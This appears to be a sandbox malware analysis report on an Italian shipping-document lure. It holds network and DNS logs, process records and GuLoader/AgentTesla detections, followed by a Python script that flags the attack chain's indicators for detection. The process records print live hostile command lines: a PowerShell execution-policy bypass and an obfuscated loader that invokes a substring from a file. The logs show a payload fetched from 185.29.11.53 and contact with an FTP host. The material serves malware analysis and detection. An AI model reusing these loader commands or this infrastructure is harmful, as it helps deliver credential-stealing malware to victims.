                                        Sep 25, 2024 12:35:50.514352083 CEST44349738172.67.74.152192.168.2.4
                                        Sep 25, 2024 12:35:50.514677048 CEST44349738172.67.74.152192.168.2.4
                                        Sep 25, 2024 12:35:50.562341928 CEST49738443192.168.2.4172.67.74.152
                                        Sep 25, 2024 12:35:50.737133026 CEST49738443192.168.2.4172.67.74.152
                                        Sep 25, 2024 12:35:50.779403925 CEST44349738172.67.74.152192.168.2.4
                                        Sep 25, 2024 12:35:50.840887070 CEST44349738172.67.74.152192.168.2.4
                                        Sep 25, 2024 12:35:50.841284990 CEST44349738172.67.74.152192.168.2.4
                                        Sep 25, 2024 12:35:50.841370106 CEST49738443192.168.2.4172.67.74.152
                                        Sep 25, 2024 12:35:50.864151955 CEST49738443192.168.2.4172.67.74.152
                                        Sep 25, 2024 12:35:52.512583017 CEST4973921192.168.2.4192.185.13.234
                                        Sep 25, 2024 12:35:52.518481970 CEST2149739192.185.13.234192.168.2.4
                                        Sep 25, 2024 12:35:52.518573046 CEST4973921192.168.2.4192.185.13.234
                                        Sep 25, 2024 12:35:52.520402908 CEST4973921192.168.2.4192.185.13.234
                                        Sep 25, 2024 12:35:52.525293112 CEST2149739192.185.13.234192.168.2.4
                                        Sep 25, 2024 12:35:52.525358915 CEST4973921192.168.2.4192.185.13.234
Timestamp | Source Port | Dest Port | Source IP | Dest IP
Sep 25, 2024 12:35:50.022074938 CEST | 49583 | 53 | 192.168.2.4 | 1.1.1.1
Sep 25, 2024 12:35:50.030332088 CEST | 53 | 49583 | 1.1.1.1 | 192.168.2.4
Sep 25, 2024 12:35:52.165589094 CEST | 50414 | 53 | 192.168.2.4 | 1.1.1.1
Sep 25, 2024 12:35:52.509350061 CEST | 53 | 50414 | 1.1.1.1 | 192.168.2.4

Timestamp | Source IP | Dest IP | Trans ID | OP Code | Name | Type | Class | DNS over HTTPS
Sep 25, 2024 12:35:50.022074938 CEST | 192.168.2.4 | 1.1.1.1 | 0x782c | Standard query (0) | api.ipify.org | A (IP address) | IN (0x0001) | false
Sep 25, 2024 12:35:52.165589094 CEST | 192.168.2.4 | 1.1.1.1 | 0xc1cf | Standard query (0) | ftp.concaribe.com | A (IP address) | IN (0x0001) | false

Timestamp | Source IP | Dest IP | Trans ID | Reply Code | Name | CName | Address | Type | Class | DNS over HTTPS
Sep 25, 2024 12:35:50.030332088 CEST | 1.1.1.1 | 192.168.2.4 | 0x782c | No error (0) | api.ipify.org | - | 172.67.74.152 | A (IP address) | IN (0x0001) | false
Sep 25, 2024 12:35:50.030332088 CEST | 1.1.1.1 | 192.168.2.4 | 0x782c | No error (0) | api.ipify.org | - | 104.26.13.205 | A (IP address) | IN (0x0001) | false
Sep 25, 2024 12:35:50.030332088 CEST | 1.1.1.1 | 192.168.2.4 | 0x782c | No error (0) | api.ipify.org | - | 104.26.12.205 | A (IP address) | IN (0x0001) | false
Sep 25, 2024 12:35:52.509350061 CEST | 1.1.1.1 | 192.168.2.4 | 0xc1cf | No error (0) | ftp.concaribe.com | concaribe.com | - | CNAME (Canonical name) | IN (0x0001) | false
Sep 25, 2024 12:35:52.509350061 CEST | 1.1.1.1 | 192.168.2.4 | 0xc1cf | No error (0) | concaribe.com | - | 192.185.13.234 | A (IP address) | IN (0x0001) | false

• api.ipify.org
• 185.29.11.53
Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
0 | 192.168.2.4 | 49737 | 185.29.11.53 | 80 | 2124 | C:\Program Files (x86)\Windows Mail\wabmig.exe

Timestamp | Bytes transferred | Direction | Data
Sep 25, 2024 12:35:48.694613934 CEST | 177 | OUT | GET /bIGuEflfnZjESw74.bin HTTP/1.1
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:121.0) Gecko/20100101 Firefox/121.0
Host: 185.29.11.53
Cache-Control: no-cache
Sep 25, 2024 12:35:49.297199011 CEST | 1236 | IN | HTTP/1.1 200 OK
Content-Type: application/octet-stream
Last-Modified: Wed, 25 Sep 2024 08:57:18 GMT
Accept-Ranges: bytes
ETag: "255312ed28fdb1:0"
Server: Microsoft-IIS/8.5
Date: Wed, 25 Sep 2024 10:35:47 GMT
Content-Length: 241728


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
0 | 192.168.2.4 | 49738 | 172.67.74.152 | 443 | 2124 | C:\Program Files (x86)\Windows Mail\wabmig.exe

Timestamp | Bytes transferred | Direction | Data
2024-09-25 10:35:50 UTC | 155 | OUT | GET / HTTP/1.1
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:99.0) Gecko/20100101 Firefox/99.0
Host: api.ipify.org
Connection: Keep-Alive
2024-09-25 10:35:50 UTC | 211 | IN | HTTP/1.1 200 OK
Date: Wed, 25 Sep 2024 10:35:50 GMT
Content-Type: text/plain
Content-Length: 11
Connection: close
Vary: Origin
CF-Cache-Status: DYNAMIC
Server: cloudflare
CF-RAY: 8c8a5eaa6cbe1869-EWR
2024-09-25 10:35:50 UTC | 11 | IN | Data Raw: 38 2e 34 36 2e 31 32 33 2e 33 33
Data Ascii: 8.46.123.33



Target ID: 0
Start time: 06:34:34
Start date: 25/09/2024
Path: C:\Windows\SysWOW64\cmd.exe
Wow64 process (32bit): true
Commandline: C:\Windows\system32\cmd.exe /c powershell.exe -ex bypass -command Mount-DiskImage -ImagePath (gc C:\Windows\path.txt) > tmp.log 2>&1
Imagebase: 0x240000
File size: 236'544 bytes
MD5 hash: D0FCE3AFA6AA1D58CE9FA336CC2B675B
Has elevated privileges: true
Has administrator privileges: true
Programmed in: C, C++ or other language
Reputation: high
Has exited: true

Target ID: 1
Start time: 06:34:34
Start date: 25/09/2024
Path: C:\Windows\System32\conhost.exe
Wow64 process (32bit): false
Commandline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Imagebase: 0x7ff7699e0000
File size: 862'208 bytes
MD5 hash: 0D698AF330FD17BEE3BF90011D49251D
Has elevated privileges: true
Has administrator privileges: true
Programmed in: C, C++ or other language
Reputation: high
Has exited: true

                                        Target ID:2
                                        Start time:06:34:34
                                        Start date:25/09/2024
                                        Path:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                        Wow64 process (32bit):true
                                        Commandline:powershell.exe -ex bypass -command Mount-DiskImage -ImagePath (gc C:\Windows\path.txt)
                                        Imagebase:0xca0000
                                        File size:433'152 bytes
                                        MD5 hash:C32CA4ACFCC635EC1EA6ED8A34DF5FAC
                                        Has elevated privileges:true
                                        Has administrator privileges:true
                                        Programmed in:C, C++ or other language
                                        Reputation:high
                                        Has exited:true

                                        Target ID:5
                                        Start time:06:34:39
                                        Start date:25/09/2024
                                        Path:\Device\CdRom1\Documenti di spedizione 0009333000459595995.exe
                                        Wow64 process (32bit):true
                                        Commandline:"E:\Documenti di spedizione 0009333000459595995.exe"
                                        Imagebase:0x400000
                                        File size:748'488 bytes
                                        MD5 hash:6C446FD0A3F6D498F5CBD0725CE7F232
                                        Has elevated privileges:true
                                        Has administrator privileges:true
                                        Programmed in:C, C++ or other language
                                        Reputation:low
                                        Has exited:true

                                        Target ID:6
                                        Start time:06:34:40
                                        Start date:25/09/2024
                                        Path:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                        Wow64 process (32bit):true
                                        Commandline:"powershell.exe" -windowstyle minimized "$Nasosubnasal=Get-Content 'C:\Users\user\AppData\Local\acneform\Dyssen.Mod';$Overwealthy=$Nasosubnasal.SubString(70317,3);.$Overwealthy($Nasosubnasal)"
                                        Imagebase:0xca0000
                                        File size:433'152 bytes
                                        MD5 hash:C32CA4ACFCC635EC1EA6ED8A34DF5FAC
                                        Has elevated privileges:true
                                        Has administrator privileges:true
                                        Programmed in:C, C++ or other language
                                        Yara matches:
                                        • Rule: JoeSecurity_GuLoader_2, Description: Yara detected GuLoader, Source: 00000006.00000002.2470285181.0000000009291000.00000040.00001000.00020000.00000000.sdmp, Author: Joe Security
                                        Reputation:high
                                        Has exited:true

                                        Target ID:7
                                        Start time:06:34:40
                                        Start date:25/09/2024
                                        Path:C:\Windows\System32\conhost.exe
                                        Wow64 process (32bit):false
                                        Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                        Imagebase:0x7ff7699e0000
                                        File size:862'208 bytes
                                        MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                        Has elevated privileges:true
                                        Has administrator privileges:true
                                        Programmed in:C, C++ or other language
                                        Reputation:high
                                        Has exited:true

                                        Target ID:11
                                        Start time:06:35:39
                                        Start date:25/09/2024
                                        Path:C:\Program Files (x86)\Windows Mail\wabmig.exe
                                        Wow64 process (32bit):true
                                        Commandline:"C:\Program Files (x86)\windows mail\wabmig.exe"
                                        Imagebase:0x660000
                                        File size:66'048 bytes
                                        MD5 hash:BBC90B164F1D84DEDC1DC30F290EC5F6
                                        Has elevated privileges:true
                                        Has administrator privileges:true
                                        Programmed in:C, C++ or other language
                                        Yara matches:
                                        • Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 0000000B.00000002.3011574723.00000000244E1000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                        • Rule: JoeSecurity_AgentTesla_1, Description: Yara detected AgentTesla, Source: 0000000B.00000002.3011574723.00000000244E1000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                        • Rule: JoeSecurity_AgentTesla_1, Description: Yara detected AgentTesla, Source: 0000000B.00000002.3011574723.0000000024505000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                        Reputation:moderate
                                        Has exited:false

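                                        The process records above describe the whole delivery chain in their command lines: cmd.exe starts PowerShell with the execution policy bypassed to Mount-DiskImage a path read from C:\Windows\path.txt (Target 0 and 2); the mounted image appears as E: and the executable on it runs from \Device\CdRom1 (Target 5); a minimized PowerShell then reads a file under AppData, cuts a three-character substring out of it and dot-invokes that substring with the file content as its argument (Target 6, where the GuLoader Yara rule fires); the AgentTesla matches land in wabmig.exe, a Microsoft binary under Windows Mail launched with no arguments (Target 11). The Python below is an added example, not Joe Sandbox's or the sample's own code: it parses a constructed excerpt of the process listing and flags each record with the indicators a detection engineer would write for this chain. The indicator names, the regular expressions and the one-entry injection-host allowlist are the example's own assumptions; the reading of the three-character substring as the cmdlet alias iex is an inference from the command line, not something the report states.

```python
import re
from typing import Dict, List

# Constructed excerpt modelled on the process records in the report above. Only the
# fields the example needs are kept (Target ID, Path, Commandline); records are
# separated by a blank line, as in the listing.
SAMPLE_REPORT = r"""
Target ID:0
Path:C:\Windows\SysWOW64\cmd.exe
Commandline:C:\Windows\system32\cmd.exe /c powershell.exe -ex bypass -command Mount-DiskImage -ImagePath (gc C:\Windows\path.txt) > tmp.log 2>&1

Target ID:2
Path:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
Commandline:powershell.exe -ex bypass -command Mount-DiskImage -ImagePath (gc C:\Windows\path.txt)

Target ID:5
Path:\Device\CdRom1\Documenti di spedizione 0009333000459595995.exe
Commandline:"E:\Documenti di spedizione 0009333000459595995.exe"

Target ID:6
Path:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
Commandline:"powershell.exe" -windowstyle minimized "$Nasosubnasal=Get-Content 'C:\Users\user\AppData\Local\acneform\Dyssen.Mod';$Overwealthy=$Nasosubnasal.SubString(70317,3);.$Overwealthy($Nasosubnasal)"

Target ID:11
Path:C:\Program Files (x86)\Windows Mail\wabmig.exe
Commandline:"C:\Program Files (x86)\windows mail\wabmig.exe"
"""

# (name, pattern, meaning). Names and patterns are this example's assumptions.
INDICATORS = [
    ("exec_policy_bypass",
     re.compile(r"-(ex|ep|executionpolicy)\s+bypass", re.I),
     "execution policy bypassed on the command line"),
    ("hidden_window",
     re.compile(r"-w(indowstyle)?\s+(hidden|minimized)", re.I),
     "console window hidden or minimized"),
    ("mount_diskimage",
     re.compile(r"Mount-DiskImage", re.I),
     "PowerShell mounts an ISO/IMG; this is how E: appears in the report"),
    ("script_from_file",
     re.compile(r"(Get-Content|\bgc\b)\s+'?[A-Za-z]:\\", re.I),
     "script body or argument read from a file rather than passed inline"),
    ("substring_cmdlet_name",
     re.compile(r"\.SubString\(\s*\d+\s*,\s*3\s*\)", re.I),
     "a 3-character token is cut out of file content and used as a command; "
     "consistent with the alias iex (inference, not stated by the report)"),
    ("dot_invoke_variable",
     re.compile(r"\.\$\w+\("),
     "dot-invocation of a variable: the command name is resolved only at run time"),
    ("run_from_optical_media",
     re.compile(r'^"?[D-Z]:\\|\\Device\\CdRom', re.I | re.M),
     "process image lives on a mounted image / optical device"),
]

# Signed Microsoft binaries seen as injection hosts. Constructed from this report only
# (wabmig.exe ships under Windows Mail); extend it from your own telemetry.
KNOWN_INJECTION_HOSTS = {"wabmig.exe"}


def parse_processes(report: str) -> List[Dict[str, str]]:
    """Split the 'Key:Value' listing into one dict per process record.
    Values such as paths contain further colons, so split on the first colon only."""
    procs = []
    for block in re.split(r"\n\s*\n", report.strip()):
        rec: Dict[str, str] = {}
        for line in block.splitlines():
            key, _, value = line.partition(":")
            rec[key.strip()] = value.strip()
        procs.append(rec)
    return procs


def indicators_for(rec: Dict[str, str]) -> List[str]:
    """Return the sorted indicator names that match one process record."""
    path = rec.get("Path", "")
    cmd = rec.get("Commandline", "")
    haystack = cmd + "\n" + path          # re.M lets ^ anchor on each line
    found = [name for name, rx, _ in INDICATORS if rx.search(haystack)]
    image = path.rsplit("\\", 1)[-1].lower()
    # A known host started with no arguments at all is the hollowing pattern
    # this report shows for wabmig.exe; real use of the tool passes arguments.
    if image in KNOWN_INJECTION_HOSTS and cmd.strip().strip('"').lower().endswith(image):
        found.append("known_injection_host")
    return sorted(found)


def triage(report: str) -> Dict[str, List[str]]:
    """Map each Target ID to its indicator list."""
    return {rec["Target ID"]: indicators_for(rec) for rec in parse_processes(report)}


def explain(report: str) -> List[str]:
    """Human-readable lines, one per (process, indicator), for an analyst note."""
    meaning = {name: text for name, _, text in INDICATORS}
    meaning["known_injection_host"] = "legitimate binary launched without arguments, the report's payload host"
    return [f"Target {tid}: {name}: {meaning[name]}"
            for tid, names in triage(report).items() for name in names]


if __name__ == "__main__":
    for line in explain(SAMPLE_REPORT):
        print(line)
```

                                        Run stand-alone it prints one line per hit; the useful property for detection is that Target 6 is caught by the shape of the command line (SubString of length 3 followed by `.$var(`) and not by the random variable names or the file path, both of which change from sample to sample, while the Mount-DiskImage stage is caught before any payload runs.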
                                        No disassembly